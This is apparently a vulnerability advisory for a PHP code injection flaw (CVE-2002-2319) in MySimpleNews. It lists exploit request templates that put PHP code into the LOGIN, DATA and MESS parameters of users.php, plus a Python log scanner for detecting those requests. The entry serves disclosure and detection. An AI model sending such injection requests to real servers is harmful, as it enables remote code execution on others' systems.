MySimpleNews PHP Injection Vulnerability

Vulnerability ID: 1107014
Vulnerability type: Code injection
Published: 2002-10-02
Updated: 2002-12-31
CVE ID: CVE-2002-2319
CNNVD-ID: CNNVD-200212-796
Platform: PHP
CVSS score: 7.5
|Vulnerability Source
https://www.exploit-db.com/exploits/21900
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200212-796
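|Vulnerability Details
A static code injection vulnerability exists in users.php in MySimpleNews. Remote attackers can inject arbitrary PHP code and HTML via the (1) LOGIN, (2) DATA, and (3) MESS parameters, which are inserted into news.php3.
|Exploit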
source: http://www.securityfocus.com/bid/5865/info

MySimpleNews allows users to enter news articles through a web interface. It will allow PHP code to be injected into URI parameters of the 'users.php' script, which will be stored into a MySimpleNews file (news.php3). The injected code may then be executed by the attacker by requesting the 'news.php3' script.

http://[target]/users.php?LOGIN=[PHP code]

http://[target]/users.php?DATA=[PHP code]

http://[target]/users.php?MESS=[PHP code]

PHP code injected in this manner can be executed with the following request:

http://[target]/news.php3
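
A detection check for the requests described above, as an added example that is not part of the original advisory: it scans web server access logs for `users.php` requests whose LOGIN, DATA or MESS parameter carries a PHP open tag, including nested percent-encoding. The Combined Log Format, the function names and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, unquote_plus, urlsplit

# users.php parameters named in the advisory.
INJECTABLE_PARAMS = {"LOGIN", "DATA", "MESS"}
# PHP open tags: <?php, <?=, short <?, ASP-style <%, <script language="php">.
PHP_TAG = re.compile(r"<\?|<%|<script[^>]*language\s*=\s*[\"']?php", re.I)
# Request line of a Common/Combined Log Format entry (assumed log format).
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed sample log lines (documentation addresses, harmless payload).
SAMPLE_LOG = [
    '192.0.2.10 - - [02/Oct/2002:10:00:01 +0000] "GET /users.php?LOGIN=alice&MESS=hello+world HTTP/1.0" 200 512',
    '192.0.2.44 - - [02/Oct/2002:10:02:17 +0000] "GET /users.php?LOGIN=%3C%3Fphp%20echo%201%3B%20%3F%3E HTTP/1.0" 200 512',
    '192.0.2.44 - - [02/Oct/2002:10:02:30 +0000] "GET /users.php?DATA=x&MESS=%253C%253Fphp%2520echo%25201%253B HTTP/1.0" 200 512',
    '192.0.2.44 - - [02/Oct/2002:10:02:41 +0000] "GET /news.php3 HTTP/1.0" 200 2048',
]


def fully_decode(value, max_rounds=3):
    """Undo nested percent-encoding (e.g. %253C -> %3C -> <)."""
    for _ in range(max_rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value


def suspicious_params(log_line):
    """Return sorted names of users.php parameters that carry a PHP open tag."""
    match = REQUEST.search(log_line)
    if not match:
        return []
    url = urlsplit(match.group(1))
    if not url.path.lower().endswith("/users.php"):
        return []
    hits = {name for name, value in parse_qsl(url.query, keep_blank_values=True)
            if name in INJECTABLE_PARAMS and PHP_TAG.search(fully_decode(value))}
    return sorted(hits)


def scan(lines):
    """Return (line_number, params) for every flagged line, numbering from 1."""
    findings = []
    for number, line in enumerate(lines, start=1):
        params = suspicious_params(line)
        if params:
            findings.append((number, params))
    return findings
```

Access logs record only the query string, so parameters sent in a POST body are not visible to this check; inspecting `news.php3` itself for unexpected PHP open tags covers that case.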
|References

Source: BID
Name: 5865
Link: http://www.securityfocus.com/bid/5865
Source: XF
Name: mysimplenews-users-news-php(10296)
Link: http://www.iss.net/security_center/static/10296.php
Source: BUGTRAQ
Name: 20021002MySimpleNews(PHP)
Link: http://archives.neohapsis.com/archives/bugtraq/2002-10/0027.html